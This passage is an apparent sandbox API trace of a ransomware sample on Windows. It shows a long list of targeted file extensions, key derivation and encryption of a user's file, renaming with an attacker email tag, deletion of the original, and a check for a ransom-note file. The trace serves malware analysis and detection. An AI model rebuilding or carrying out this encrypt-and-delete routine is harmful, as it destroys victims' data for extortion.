	[0188.097] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".odp") returned=".odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0188.097] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0188.097] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0188.097] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\g7ne20mhtcw_rf5xx.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\g7ne20mhtcw_rf5xx.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0188.098] ReadFile (in: hFile=0x2c0, lpBuffer=0xfda128, nNumberOfBytesToRead=0x1601, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfda128*, lpNumberOfBytesRead=0x18b350*=0x1601, lpOverlapped=0x0) returned 1
	[0188.100] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.100] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb5d8) returned 1
	[0188.102] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.102] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0188.102] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.103] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0188.103] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.103] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb93f0) returned 1
	[0188.103] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.103] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x1601, dwBufLen=0x1601 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x1610) returned 1
	[0188.105] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.105] RtlMoveMemory (in: Destination=0xfdd180, Source=0xfda128, Length=0x1601 | out: Destination=0xfdd180) 
	[0188.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.106] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdd180*, pdwDataLen=0x18aefc*=0x1601, dwBufLen=0x1610 | out: pbData=0xfdd180*, pdwDataLen=0x18aefc*=0x1610) returned 1
	[0188.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.106] CryptDestroyKey (hKey=0xfb93f0) returned 1
	[0188.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.106] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0188.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.107] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0188.107] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.107] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0188.107] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.107] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0188.109] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\g7ne20mhtcw_rf5xx.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 115
	[0188.109] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\g7ne20mhtcw_rf5xx.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\g7ne20mhtcw_rf5xx.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0188.109] WriteFile (in: hFile=0x388, lpBuffer=0xfdd180*, nNumberOfBytesToWrite=0x1610, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesWritten=0x18b358*=0x1610, lpOverlapped=0x0) returned 1
	[0188.112] CloseHandle (hObject=0x388) returned 1
	[0188.112] CloseHandle (hObject=0x2c0) returned 1
	[0188.112] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\g7ne20mhtcw_rf5xx.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\g7ne20mhtcw_rf5xx.odp")) returned 1
	[0188.115] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\g7ne20mhtcw_rf5xx.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\g7ne20mhtcw_rf5xx.odp")) returned 0
	[0188.115] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdfd66e0, ftCreationTime.dwHighDateTime=0x1d969df, ftLastAccessTime.dwLowDateTime=0x4cfb0c80, ftLastAccessTime.dwHighDateTime=0x1d96fc2, ftLastWriteTime.dwLowDateTime=0x4cfb0c80, ftLastWriteTime.dwHighDateTime=0x1d96fc2, nFileSizeHigh=0x0, nFileSizeLow=0xd5df, dwReserved0=0x0, dwReserved1=0x0, cFileName="KIpouQk1RGaY1Fz.ppt", cAlternateFileName="KIPOUQ~1.PPT")) returned 1
	[0188.116] lstrcmpW (lpString1="KIpouQk1RGaY1Fz.ppt", lpString2="..") returned 1
	[0188.116] lstrcmpW (lpString1="KIpouQk1RGaY1Fz.ppt", lpString2=".") returned 1
	[0188.116] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\"
	[0188.116] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\", lpString2="KIpouQk1RGaY1Fz.ppt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\KIpouQk1RGaY1Fz.ppt") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\KIpouQk1RGaY1Fz.ppt"
	[0188.116] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\KIpouQk1RGaY1Fz.ppt") returned 71
	[0188.116] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0188.116] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\KIpouQk1RGaY1Fz.ppt", cchLength=0x47 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\kipouqk1rgay1fz.ppt") returned 0x47
	[0188.117] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.117] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\kipouqk1rgay1fz.ppt", lpSrch="help_decrypt_your_files") returned 0x0
	[0188.117] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\kipouqk1rgay1fz.ppt" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\kipouqk1rgay1fz.ppt") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\kipouqk1rgay1fz.ppt"
	[0188.117] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\kipouqk1rgay1fz.ppt") returned 71
	[0188.117] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.117] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.117] StrStrW (lpFirst=".ppt", lpSrch=".") returned=".ppt"
	[0188.117] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.118] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.t